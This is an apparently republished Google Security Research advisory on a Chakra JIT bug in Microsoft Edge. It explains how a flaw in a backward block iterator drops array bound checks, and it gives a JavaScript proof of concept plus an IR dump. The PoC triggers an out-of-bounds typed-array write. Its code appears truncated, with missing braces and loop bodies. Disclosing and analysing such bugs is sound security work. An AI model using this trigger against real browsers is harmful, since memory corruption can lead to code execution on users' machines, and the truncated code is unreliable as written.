Microsoft Edge Chakra JIT – Bound Check Elimination Bug

  • 作者: Google Security Research
    日期: 2018-05-18
  • 类别:
  • 来源:
  • /*
    Chakra uses the InvariantBlockBackwardIterator class to backpropagate the information about the hoisted bound checks. But the class follows the linked list instaed of the control flow. This may lead to incorrectly remove the bound checks.
    In the following code, currentBlock's block number is 4 and hoistBlock's block number is 1 (please see the IR code). I assume it should visit 4 -> 3 (skipped) -> 1 (break) in order with following the control flow, but it actually visits 4 -> 3 (skipped) -> 2 -> 1 (break) in order. This makes the block 2 have the wrong information about the bounds which affects the bound checks in the block 5 to be removed.
    if(hoistBlock != currentBlock)
    for(InvariantBlockBackwardIterator it(this, currentBlock->next, hoistBlock, nullptr);
    BasicBlock *const block = it.Block();
    function opt(arr, idx) {
    ((arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
    function main() {
    let arr = new Uint32Array(1);
    for (let i = 0; i < 10000; i++) {
    Here's the IR code for the PoC:
    FunctionEntry #
    BLOCK 0: Out(1, 2)
    s1[Object].var=Ld_A 0xXXXXXXXX (GlobalObject)[Object].var #
    s21(s2)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I42147483632 (0x7FFFFFF0)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
    s3[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #
    s22(s4)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I42147483633 (0x7FFFFFF1)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
    s23(s5)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4286331153 (0x11111111)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
    s24(s6)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #
    s7[LikelyCanBeTaggedValue_Uint32Array].var = ArgIn_Aprm2<40>[LikelyCanBeTaggedValue_Uint32Array].var! #
    s8[LikelyUndefined_CanBeTaggedValue].var = ArgIn_Aprm3<48>[LikelyUndefined_CanBeTaggedValue].var! #
    Line 2: arr.length === 0x7ffffff0 && arr[0x7ffffff0]) || false) && (arr.length === 0x7ffffff0 && arr[0x7ffffff1]) || (arr[0x11111111] = 0x1234);
    Col7: ^
     BailOnNotArrays7[LikelyCanBeTaggedValue_Uint32Array].var #0000Bailout: #0000 (BailOutOnNotArray)
    s25.u32 =LdIndir[s7[Uint32Array].var+32].u32#0000 
     ByteCodeUses s7#0000 
    s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s25.u32#0000 
    s15[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 
    s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #0004 
     ByteCodeUses s10 #0004 
     BrNeq_I4 $L4, s26(s10)[CanBeTaggedValue_Int_IntCanBeUntagged].i32!, 2147483632 (0x7FFFFFF0).i32 #0004 
    BLOCK 1: In(0) Out(2, 3)
    s15[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var#0008 
    s9[Boolean].var =Ld_A 0xXXXXXXXX (true)[Boolean].var#0008 
     BoundCheck 2147483633 < s25.u32#000fBailout: #000f (BailOutOnFailedHoistedBoundCheck)
    s27.u64 =LdIndir[s7[Uint32Array].var+56].u64#000f 
    s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A[s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483632].var #000fBailout: #000f (BailOutConventionalTypedArrayAccessOnly)
     ByteCodeUses s16 #0015 
    s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0015 
    s9[CanBeTaggedValue_Int].var = ToVars29(s9)[CanBeTaggedValue_Int].i32 #0018 
     ByteCodeUses s16 #0018 
     BrTrue_I4$L3, s28(s16)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0018 
    BLOCK 2: In(0, 1) Out(5)
    s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #001c 
     Br $L2 #001e 
    BLOCK 3: In(1) Out(4) DeadOut(5)
     ByteCodeUses s7#0021 
    s30(s17)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s25.u32#0021 
    s18[Boolean].var = Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 
    s9[Boolean].var =Ld_A 0xXXXXXXXX (false)[Boolean].var #0025 
     ByteCodeUses s17 #0025 
    BLOCK 4: In(3) Out(8, 5)
    s18[Boolean].var = Ld_A 0xXXXXXXXX (true)[Boolean].var#0029 
    s9[Boolean].var =Ld_A 0xXXXXXXXX (true)[Boolean].var#0029 
    s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = LdElemI_A[s7[Uint32Array][seg: s27][segLen: s25][><].var+2147483633].var #0030Bailout: #0030 (BailOutConventionalTypedArrayAccessOnly)
     ByteCodeUses s19 #0036 
    s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I4s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0036 
    s9[CanBeTaggedValue_Int].var = ToVars29(s9)[CanBeTaggedValue_Int].i32 #0039 
     ByteCodeUses s19 #0039 
     BrTrue_I4$L9, s31(s19)[CanBeTaggedValue_Int_IntCanBeUntagged].i32! #0039 
    BLOCK 5: In(2, 4) Out(6) DeadIn(3)
    s32.u64 =LdIndir[s7[Uint32Array].var+56].u64#003d 
    [s7[Uint32Array][seg: s32][segLen: s25][><].var+286331153].var = StElemI_A4660 (0x1234).i32 #003dBailout: #003d (BailOutConventionalTypedArrayAccessOnly)
    s33(s20)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0043 
     ByteCodeUses s20 #0046 
    s29(s9)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 = Ld_I44660 (0x1234)[CanBeTaggedValue_Int_IntCanBeUntagged].i32 #0046 
    s34.u64 =Ld_A s32.u64 #004b 
     Br $L1 #004b 
    BLOCK 8: **** Air lock Block **** In(4) Out(6)
    s34.u64 =Ld_A s27.u64 #004b 
     Br $L1 #004b 
    BLOCK 6: In(8, 5) Out(7)
    s0[Undefined].var = Ld_A0xXXXXXXXX (undefined)[Undefined].var #004b 
    Line 3: }
    Col1: ^
     StatementBoundary#-1 #004d 
    BLOCK 7: In(6)